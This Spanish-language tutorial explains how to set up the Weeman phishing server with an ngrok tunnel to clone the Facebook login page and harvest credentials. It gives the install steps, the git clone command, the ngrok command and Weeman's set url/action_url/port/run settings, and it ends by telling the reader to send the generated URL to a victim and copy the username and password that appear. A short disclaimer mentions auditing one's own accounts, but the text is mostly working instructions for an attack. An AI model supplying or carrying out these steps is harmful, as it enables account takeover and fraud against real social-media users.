Además de PhisherMan + ngrok, como se vio en un tutorial anterior de esta página web, también existen otras alternativas. Concretamente Weeman, que combinada con ngrok podrá hacer ataques de phishing a cuentas de la famosa red social Facebook y otras redes sociales. Una forma sencilla de obtener credenciales de cuentas sin necesidad de realizar lentos ataques de fuerza bruta, etc.
Con este tutorial podrás practicar con esta técnica de hacking para aprender de ella o para realizar auditorías de seguridad a tus propias cuentas de Facebook, comprobando así su efectividad.
Desde esta página no impulsamos al uso de este tipo de herramientas para uso fraudulento. Recuerda que robar cuentas de otros puede ser un delito y no nos hacemos responsables de ello.
¿Qué debes saber sobre Weeman + Ngrok?
Con Weeman y Ngrok tendrás todo lo que necesitas para realizar ataques phising a cuentas de Facebook. Es decir, crear tu propio servidor phising para imitar a Facebook (u otra) y que el usuario propietario de la red social pique en la trampa e introduzca los credenciales que e te serán enviados de forma remota.
Weeman está potenciado por Python, y puede hacer que tengas un servidor HTTP para esta práctica. Por otro lado, Ngrok garantizará la creación de un túnel entre el servidor y la víctima para que sea transferido.
Instalar lo necesario
Si aún no tienes instalado todo lo necesario en Linux, puedes seguir estos sencillos pasos para obtener Weeman y Ngrok.
Los pasos comienzan por instalar ngrok:
- Descargar Ngrok, supongamos que está en Descargas.
- Ahora ve al directorio descargas: cd Descargas
- Ejecuta el siguiente comando desde el directorio donde lo hayas descargado: unzip /path/to/ngrok.zip
- Cambia el directorio extraído a la ruta correcta: sudo cp /home/user/Descargas/ /usr/bin
Ahora le toca el turno a Weeman:
- Descarga Weeman desde GitHub (debes tener instalado Git para ejecutar este comando en GNU/Linux): git clone https://github.com/samyoyo/weeman.git
- Ve al directorio de la descarga: cd weeman
- Ahora dale permisos de ejecución al script de Python: chmod +x weeman.py
- Ejecuta Weeman con: python weeman.py
- Finalmente y ahora haz que muestre el menú de opciones para comenzar con: show
- No cierres la ventana del terminal, te servirá para después.
Recuerda sustituir las rutas por las que correspondan en tu caso…
Usar Weeman + ngrok para obtener credenciales de redes sociales
Para comenzar a usar estos proyectos, los pasos son igualmente sencillos:
- Ahora, dejando la ventana donde estás ejecutando Weeman abierta, abres otra ventana del terminal o pestaña independiente.
- En ella ejecutas los comandos necesarios para poder poner en marcha el servidor con ngrok:
- ngrok http -bind-tls=true 8080
- set url https://facebook.com
- set action_url xxx_ngrok.io
- set port 8080
- run
- Vuelve a la ventana de Weman y comienza a rellenar los parámetros que se te piden sobre la cuenta de la red social que deseas atacar (URL de la red social, pueto, URL que se generó con ngrok…):
- set url https://www.facebook.com/
- set port 8080
- set action_url 49b97fbe.ngrok.io (la URL de ngrok, recuerda poner la que te corresponda)
- show (muestra nuevamente los campos, comprueba que están todos rellenos y correctos)
- Ahora ya está armado todo. Tan solo deberás hacer llegar la URL generada por ngrok a la víctima u objetivo de auditoría y esperar a que pique en la trampa e introduzca su usuario y contraseña.
- Una vez lo haga, se te mostrará el nombre de usuario y contraseña en pantalla para que puedas copiarlo.